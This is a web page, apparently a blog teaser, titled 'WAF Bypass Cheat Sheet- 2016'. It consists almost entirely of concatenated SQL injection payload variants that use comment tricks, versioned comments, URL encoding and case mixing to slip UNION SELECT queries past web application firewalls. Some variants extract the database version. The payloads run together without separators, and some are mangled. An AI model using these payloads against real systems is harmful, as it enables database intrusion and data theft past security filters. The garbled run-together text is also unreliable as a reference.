WAF Bypass Cheat Sheet- 2016

WAF Bypass Cheat Sheet- 2016 Union Select+union+distinct+select++union+distinctROW+select+/**//*!12345UNION SELECT*//**//**//*!50000UNION SELECT*//**/+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/++/*!u%6eion*/+/*!se%6cect*/+/**/uniUNIONon/**/aALLll/**/selSELECTect/**/1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23/*!50000%55nIoN*/+/*!50000%53eLeCt*/union /*!50000%53elect*/%55nion %53elect+–+Union+–+Select+–++UnIoN/*&a=*/SeLeCT/*&a=*/id=1+?UnI?On?+’SeL?ECT?id=1+’UnI’||’on’+SeLeCT’UnIoN SeLeCt CoNcAt(version())–uNiOn aLl sElEcTuUNIONnion all sSELECTelect/*union*/union/*select*/select+1,2,3/*/*uniXon*/union/*selXect*/select+1,2/*un/**/ion+sel/**/ect+#1q%0Aunion all#qa%0A#%0Aselectunion /*!select*/+union/**/select/**//**/union/**/select/**//**/union/*!50000select*//**//*!12345UNION SELECT*//**//**//*!50000UNION SELECT*//**//**/uniUNIONon/**/selSELECTect/**//**/uniUNIONon/**/aALLll/**/selSELECTect/**//**//*!union*//**//*!select*//**//**/UNunionION/**/SELselectECT/**//**//*UnIOn*//**//*SEleCt*//**//**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**//**/UNunionION/**/all/**/SELselectECT/**//**//*UnIOn*//**/all/**//*SEleCt*//**//**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/uni%20union%20/*!select*/%20union%23aa%0Aselectunion+distinct+select+union+distinctROW+select+/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+/*!u%6eion*/+/*!se%6cect*/+1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23/*!50000%55nIoN*/+/*!50000%53eLeCt*/union /*!50000%53elect*/+%2F**/+Union/*!select*/%55nion %53elect+?+Union+?+Select+?++UnIoN/*&a=*/SeLeCT/*&a=*/uNiOn aLl sElEcTuUNIONnion all sSELECTelectunion(select(1),2,3)union (select 1111,2222,3333)union (/*!/**/ SeleCT */ 11)%0A%09UNION%0CSELECT%10NULL%/*!union*//*?*//*!all*//*?*//*!select*/union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2Cunion+sel%0bect+uni*on+sel*ect++#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#aunion(select (1),(2),(3),(4),(5))UNION(SELECT(column)FROM(table))id=1+?UnI?On?+?SeL?ECT?id=1+?UnI?||?on?+SeLeCT?union select 1?+%0A,2?+%0A,3?+%0A etc...
Continue reading »